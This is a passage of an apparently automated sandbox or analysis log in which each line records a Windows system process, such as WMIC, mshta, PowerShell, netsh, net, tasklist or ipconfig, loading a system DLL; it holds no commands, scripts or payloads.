            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
            Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll
            Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: mshtml.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: iertutil.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: powrprof.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: wkscli.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: umpdc.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: urlmon.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: msiso.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: uxtheme.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: srpapi.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: msimtf.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: resourcepolicyclient.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: textinputframework.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: coreuicomponents.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: dataexchange.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: dcomp.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: jscript9.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: version.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: textshaping.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: d3d10warp.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: dxcore.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: msasn1.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
            Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
            Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
            Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
            Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ntmarta.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: esscli.dll
            Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: mswsock.dll
            Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: napinsp.dll
            Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: pnrpnsp.dll
            Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: wshbth.dll
            Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: nlaapi.dll
            Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: dnsapi.dll
            Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: winrnr.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
            Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
            Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
            Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
            Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll
            Source: C:\Windows\System32\net1.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\net1.exe Section loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exe Section loaded: wkscli.dll
            Source: C:\Windows\System32\net1.exe Section loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exe Section loaded: cryptbase.dll
            Source: C:\Windows\System32\net1.exe Section loaded: cscapi.dll
            Source: C:\Windows\System32\net1.exe Section loaded: samlib.dll
            Source: C:\Windows\System32\query.exe Section loaded: regapi.dll
            Source: C:\Windows\System32\quser.exe Section loaded: winsta.dll
            Source: C:\Windows\System32\quser.exe Section loaded: utildll.dll
            Source: C:\Windows\System32\quser.exe Section loaded: samcli.dll
            Source: C:\Windows\System32\quser.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
            Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
            Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
            Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll
            Source: C:\Windows\System32\net1.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\net1.exe Section loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exe Section loaded: wkscli.dll
            Source: C:\Windows\System32\net1.exe Section loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exe Section loaded: cryptbase.dll
            Source: C:\Windows\System32\net1.exe Section loaded: cscapi.dll
            Source: C:\Windows\System32\net1.exe Section loaded: samlib.dll
            Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\ipconfig.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\ROUTE.EXESection loaded: iphlpapi.dll
            Source: C:\Windows\System32\ROUTE.EXESection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\ROUTE.EXESection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\ROUTE.EXESection loaded: dnsapi.dll
